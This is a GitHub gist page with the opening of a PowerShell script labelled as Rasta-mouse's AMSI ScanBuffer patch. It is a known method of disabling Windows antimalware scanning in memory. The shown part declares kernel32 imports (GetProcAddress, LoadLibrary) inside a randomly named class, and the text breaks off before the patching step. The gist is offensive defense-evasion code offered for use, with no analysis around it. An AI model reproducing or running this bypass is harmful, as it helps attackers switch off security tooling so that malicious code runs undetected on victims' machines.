Skip to content

Instantly share code, notes, and snippets.

View Lindsaydoodle's full-sized avatar

Николай Lindsaydoodle

  • GDE
View GitHub Profile
#Rasta-mouses Amsi-Scan-Buffer patch \n
$goehf = @"
using System;
using System.Runtime.InteropServices;
public class goehf {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]